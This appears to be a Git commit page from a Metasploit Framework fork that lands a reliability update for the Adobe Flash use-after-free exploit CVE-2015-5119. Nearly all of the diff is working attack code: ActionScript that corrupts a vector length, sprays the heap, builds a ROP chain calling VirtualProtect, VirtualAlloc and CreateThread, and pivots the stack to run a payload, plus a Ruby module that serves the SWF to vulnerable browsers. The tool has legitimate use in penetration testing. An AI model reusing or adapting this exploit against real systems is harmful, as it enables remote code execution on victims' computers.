dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #5732, reliability update for adobe_flash_hacking_team_uaf

This commit is contained in:
wchen-r7 2015-07-17 16:43:39 -05:00
parent 837eb9ea38 a637921305
commit 7113c801b1
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
7 changed files with 144 additions and 213 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2015-5119/msf.swf
View File

Binary file not shown.

22
external/source/exploits/CVE-2015-5119/Exploit.as vendored
View File

@ -1,3 +1,4 @@
// Build with Flex SDK 4.6 + AIR 3.1
package
{
import flash.display.Sprite
@ -8,22 +9,20 @@ package
public class Exploit extends Sprite
{
private var b64:Base64Decoder = new Base64Decoder()
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
public function Exploit():void
{
//trace("Got to checkpoint 0");
if (stage) init();
else addEventListener(Event.ADDED_TO_STAGE, init);
}
public function Exploit():void
{
//trace("Got to checkpoint 0");
if (stage) init();
else addEventListener(Event.ADDED_TO_STAGE, init);
}
private function init(e:Event = null):void
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
@ -31,7 +30,8 @@ package
payload = b64.toByteArray()
removeEventListener(Event.ADDED_TO_STAGE, init);
MyClass.TryExpl(this, platform, os, payload)
Logger.log('TryExpl...')
MyClass.TryExpl(this, platform, payload)
}
}
}

146
external/source/exploits/CVE-2015-5119/Exploiter.as vendored
View File

@ -11,27 +11,33 @@ package
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var magic:uint
private var magic_arg0:uint
private var magic_arg1:uint
private var magic_object:uint
private var magic_table:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stub_address:uint
private var stub_space_object:uint
private var stub:Vector.<uint> = new Vector.<uint>(8)
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
{
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv, uv_length)
if (!ev.is_ready()) return
@ -49,9 +55,18 @@ package
cleanup()
}
static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@ -59,6 +74,8 @@ package
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
spray[i][4] = Magic
spray[i][5] = stub
}
}
@ -76,6 +93,8 @@ package
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
magic = ev.at(pos + 4) - 1
stub_space_object = ev.at(pos + 5) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
}
@ -98,6 +117,11 @@ package
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
stub_address = ev.read(stub_space_object + 0x18)
magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
magic_table = ev.read(magic_object)
magic_arg0 = ev.read(magic + 0x1c)
magic_arg1 = ev.read(magic + 0x20)
}
private function corrupt_byte_array():void
@ -138,13 +162,7 @@ package
if (platform == "linux") {
do_rop_linux()
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
do_rop_windows()
} else {
return
}
@ -167,88 +185,20 @@ package
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
// Put the fake stack on memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
@ -257,14 +207,14 @@ package
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
@ -273,13 +223,31 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
// VirtualProtect the stub with a *reliable* stackpivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
// Call to our stackpivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
}
private function do_rop_linux():void

25
external/source/exploits/CVE-2015-5119/MyClass.as vendored
View File

@ -12,6 +12,7 @@
_gc:Array,
_va:Array,
_ba:ByteArray,
_corrupted:Vector.<uint>,
_isDbg:Boolean = Capabilities.isDebugger;
// define malicious valueOf()
@ -34,7 +35,7 @@
}
// try to corrupt the length value of Vector.<uint>
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
static function TryExpl(e:Exploit, platform:String, payload:ByteArray) : Boolean
{
Logger.log("tryexpl")
try
@ -55,7 +56,6 @@
}
// find these pages
var v:Vector.<uint>;
for(i=alen-5; i >= 0; i-=3)
{
// take next allocated ByteArray
@ -67,17 +67,22 @@
if (_ba[3] != 0) throw new Error("can't cause UaF");
// check results // find corrupted vector
for(var j:int=0; j < _va.length; j++){
v = _va[j];
if (v.length != 0x3f0) {
Logger.log("v.length = 0x" + v.length.toString(16));
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
Logger.log("v.length = 0x" + v.length.toString(16));
return true
for (var j:int = 0; j < _va.length; j++) {
if (_va[j].length != 0x3f0) {
_corrupted = _va[j]
} else {
delete(_va[j])
_va[j] = null
}
}
if (_corrupted != null) {
Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
var exploiter:Exploiter = new Exploiter(e, platform, payload,_corrupted, 0x3f0)
Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
return true
}
}
Logger.log("bad allocation. try again.");
}
catch (e:Error)

4
external/source/flash_exploiter/Exploit.as vendored
View File

@ -25,13 +25,11 @@ package
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
public function Exploit()
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
@ -42,7 +40,7 @@ package
The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
*/
exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
}
}
}

146
external/source/flash_exploiter/Exploiter.as vendored Normal file → Executable file
View File

@ -11,27 +11,33 @@ package
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var magic:uint
private var magic_arg0:uint
private var magic_arg1:uint
private var magic_object:uint
private var magic_table:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stub_address:uint
private var stub_space_object:uint
private var stub:Vector.<uint> = new Vector.<uint>(8)
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
{
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv, uv_length)
if (!ev.is_ready()) return
@ -49,9 +55,18 @@ package
cleanup()
}
static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@ -59,6 +74,8 @@ package
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
spray[i][4] = Magic
spray[i][5] = stub
}
}
@ -76,6 +93,8 @@ package
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
magic = ev.at(pos + 4) - 1
stub_space_object = ev.at(pos + 5) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
}
@ -98,6 +117,11 @@ package
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
stub_address = ev.read(stub_space_object + 0x18)
magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
magic_table = ev.read(magic_object)
magic_arg0 = ev.read(magic + 0x1c)
magic_arg1 = ev.read(magic + 0x20)
}
private function corrupt_byte_array():void
@ -138,13 +162,7 @@ package
if (platform == "linux") {
do_rop_linux()
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
do_rop_windows()
} else {
return
}
@ -167,88 +185,20 @@ package
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
// Put the fake stack on memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
@ -257,14 +207,14 @@ package
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
@ -273,13 +223,31 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
// VirtualProtect the stub with a *reliable* stackpivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
// Call to our stackpivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
}
private function do_rop_linux():void

14
modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
View File

@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
@ -68,8 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
@ -105,12 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
print_warning("Target setup not supported")
send_not_found(cli)
return
end
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
@ -125,7 +118,6 @@ class Metasploit3 < Msf::Exploit::Remote
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
@ -138,9 +130,9 @@ class Metasploit3 < Msf::Exploit::Remote
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
</object>
</body>
</html>